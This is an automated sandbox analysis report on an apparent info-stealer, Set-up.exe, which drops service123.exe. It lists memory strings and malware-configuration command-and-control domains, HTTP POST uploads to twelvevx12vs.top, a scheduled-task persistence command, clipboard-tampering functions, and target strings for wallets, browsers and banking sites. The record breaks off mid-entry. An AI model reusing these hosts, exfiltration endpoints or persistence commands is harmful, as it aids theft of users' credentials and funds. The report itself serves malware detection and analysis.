Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_000115B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
5_2_000115B0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3414B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
5_2_6C3414B0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea ecx, dword ptr [esp+04h] |
5_2_000181E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6C3BAEC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6C3BAF70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6C3BAF70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
5_2_6C360860 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
5_2_6C36A970 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
5_2_6C36A9E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
5_2_6C36A9E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6C41F960h |
5_2_6C35EB10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6C364453 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
5_2_6C3E84A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
5_2_6C36C510 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
5_2_6C36A580 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
5_2_6C36A5F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
5_2_6C36A5F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
5_2_6C36E6E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
5_2_6C36E6E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, ecx |
5_2_6C3E0730 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
5_2_6C360740 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6C3BC040 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6C3BC1A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+04h] |
5_2_6C39A1E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
5_2_6C360260 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [6C41D014h] |
5_2_6C414360 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6C3BBD10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
5_2_6C3B7D10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
5_2_6C3B3840 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+04h] |
5_2_6C36D974 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
5_2_6C399B60 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
5_2_6C37BBD7 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
5_2_6C37BBDB |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6C3BB4D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
5_2_6C36D504 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [esp+04h] |
5_2_6C3B9600 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] |
5_2_6C36D674 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6C41DFF4h |
5_2_6C3B3690 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+08h] |
5_2_6C36D7F4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
5_2_6C3E3140 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6C35B1D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6C36D2A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
5_2_6C3D7350 |
Source: Malware configuration extractor |
URLs: upload.phps.top |
Source: Malware configuration extractor |
URLs: s.top |
Source: Malware configuration extractor |
URLs: @twelvevx12vs.top |
Source: Malware configuration extractor |
URLs: +twelvevx12vs.top |
Source: Malware configuration extractor |
URLs: LRPCtwelvevx12vs.top |
Source: Malware configuration extractor |
URLs: twelvevx12vs.top |
Source: Malware configuration extractor |
URLs: analforeverlovyu.top |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary41476359User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: twelvevx12vs.top |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary68176922User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 75959Host: twelvevx12vs.top |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary70233283User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 30029Host: twelvevx12vs.top |
Source: Set-up.exe, Set-up.exe, 00000000.00000003.2185018616.0000000001968000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2185018616.0000000001978000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://twelvevx12vs.top/ |
Source: Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://twelvevx12vs.top/? |
Source: Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://twelvevx12vs.top/G |
Source: Set-up.exe, 00000000.00000003.2185018616.0000000001968000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://twelvevx12vs.top/O |
Source: Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://twelvevx12vs.top/d |
Source: Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://twelvevx12vs.top/v1/upload.php |
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: UwGCIJbIlmBudMOlckMv.dll.0.dr |
String found in binary or memory: https://gcc.gnu.org/bugs/): |
Source: Set-up.exe |
String found in binary or memory: https://serviceupdate32.com/update |
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C359C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, |
5_2_6C359C22 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C359D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, |
5_2_6C359D11 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_000151B0 |
5_2_000151B0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_00013E20 |
5_2_00013E20 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C382CCE |
5_2_6C382CCE |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C34CD00 |
5_2_6C34CD00 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C34EE50 |
5_2_6C34EE50 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C350FC0 |
5_2_6C350FC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C390AC0 |
5_2_6C390AC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3544F0 |
5_2_6C3544F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3846E0 |
5_2_6C3846E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3807D0 |
5_2_6C3807D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3787C0 |
5_2_6C3787C0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C390060 |
5_2_6C390060 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C382090 |
5_2_6C382090 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C372360 |
5_2_6C372360 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C39DC70 |
5_2_6C39DC70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C355880 |
5_2_6C355880 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3798F0 |
5_2_6C3798F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C387A20 |
5_2_6C387A20 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C38DBEE |
5_2_6C38DBEE |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C38140E |
5_2_6C38140E |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C391510 |
5_2_6C391510 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C38F610 |
5_2_6C38F610 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C36F760 |
5_2_6C36F760 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C343000 |
5_2_6C343000 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C4050D0 |
5_2_6C4050D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3570C0 |
5_2_6C3570C0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: String function: 6C40ADB0 appears 49 times |
|
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: String function: 6C413820 appears 31 times |
|
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: String function: 6C4136E0 appears 45 times |
|
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: String function: 6C413B20 appears 38 times |
|
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: String function: 6C415A70 appears 77 times |
|
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: String function: 6C413560 appears 43 times |
|
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: String function: 6C415980 appears 83 times |
|
Source: unknown |
Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe" |
|
Source: C:\Users\user\Desktop\Set-up.exe |
Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" |
|
Source: C:\Users\user\Desktop\Set-up.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe |
|
Source: unknown |
Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe |
|
Source: C:\Users\user\Desktop\Set-up.exe |
Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: webio.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: windowscodecs.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: dlnashext.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: wpdshext.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: uwgcijbilmbudmolckmv.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe |
Section loaded: taskschd.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe |
Section loaded: xmllite.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: uwgcijbilmbudmolckmv.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: uwgcijbilmbudmolckmv.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_0001A521 push es; iretd |
5_2_0001A694 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3F0C30 push eax; mov dword ptr [esp], edi |
5_2_6C3F0DAA |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3BED10 push eax; mov dword ptr [esp], ebx |
5_2_6C3BEE33 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C394E31 push eax; mov dword ptr [esp], ebx |
5_2_6C394E45 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C388E7A push edx; mov dword ptr [esp], ebx |
5_2_6C388E8E |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C38A947 push eax; mov dword ptr [esp], ebx |
5_2_6C38A95B |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3BEAB0 push eax; mov dword ptr [esp], ebx |
5_2_6C3BEBDB |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C392AAC push edx; mov dword ptr [esp], ebx |
5_2_6C392AC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3A8AA0 push eax; mov dword ptr [esp], ebx |
5_2_6C3A909F |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C390AA2 push eax; mov dword ptr [esp], ebx |
5_2_6C390AB6 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3C2BF0 push eax; mov dword ptr [esp], ebx |
5_2_6C3C2F24 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3C2BF0 push edx; mov dword ptr [esp], ebx |
5_2_6C3C2F43 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C388435 push edx; mov dword ptr [esp], ebx |
5_2_6C388449 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3A8460 push eax; mov dword ptr [esp], ebx |
5_2_6C3A8A5F |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C38048B push eax; mov dword ptr [esp], ebx |
5_2_6C3804A1 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3804E0 push eax; mov dword ptr [esp], ebx |
5_2_6C3806DA |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C361CFA push eax; mov dword ptr [esp], ebx |
5_2_6C416622 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C361CFA push eax; mov dword ptr [esp], ebx |
5_2_6C416622 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C38A5A7 push eax; mov dword ptr [esp], ebx |
5_2_6C38A5BB |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3C2620 push eax; mov dword ptr [esp], ebx |
5_2_6C3C2954 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3C2620 push edx; mov dword ptr [esp], ebx |
5_2_6C3C2973 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3D06B0 push eax; mov dword ptr [esp], ebx |
5_2_6C3D0A4F |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3986A1 push 890005EAh; ret |
5_2_6C3986A9 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3806A2 push eax; mov dword ptr [esp], ebx |
5_2_6C3806DA |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3806A6 push eax; mov dword ptr [esp], ebx |
5_2_6C3806DA |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3806FD push eax; mov dword ptr [esp], ebx |
5_2_6C3806DA |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C3866F3 push edx; mov dword ptr [esp], ebx |
5_2_6C386707 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C38070E push eax; mov dword ptr [esp], ebx |
5_2_6C3806DA |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C38A777 push eax; mov dword ptr [esp], ebx |
5_2_6C38A78B |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C390042 push eax; mov dword ptr [esp], ebx |
5_2_6C390056 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C35E0D0 push eax; mov dword ptr [esp], ebx |
5_2_6C416AF6 |
Source: Set-up.exe |
Binary or memory string: VMware |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655x |
Source: Set-up.exe, 00000000.00000003.2185018616.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2154640438.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2666887733.0000000001983000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW{ |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: discord.comVMware20,11696428655f |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.co.inVMware20,11696428655d |
Source: Set-up.exe |
Binary or memory string: UT0VT.node-rednode_modules.quokkaMPC-HCMPC-BEPotPlayerMiniDaumVMwareCCleanerBrowser.exeD:G:I:F:H:C:DewMobileBorisFXInnovative SolutionsimloifkgjagghnncjkhggdhalmcnfklkbackupMultiBitHDwalletsleveldbrecoveryIntel(R)Microsoft_CorporationGoogle Web DesignerDevice MetadataWindows MailK-MeleonVSCommonvshubVS Revo Group@trezorLedger LiveMarc Gravell.tlauncherjvmsjava(local_dir_header_ofs & (pZip->m_file_offset_alignment - 1)) == 0Opera GXDefaultOpera CryptoOpera DeveloperOperaOpera UnknownOpera Beta/home/anal/bot/zip_include/zip.c(zip->entry.header_offset & (pzip->m_file_offset_alignment - 1)) == 0bit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATOR(cur_archive_file_ofs & (pZip->m_file_offset_alignment - 1)) == 0WebStorageVideoDecodeStatsoptimization_guide_prediction_model_downloads4kdownload.com\bluestacks-services\atomic\AMD |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655 |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: global block list test formVMware20,11696428655 |
Source: Set-up.exe, 00000000.00000000.2043681328.00000000017D7000.00000002.00000001.01000000.00000003.sdmp |
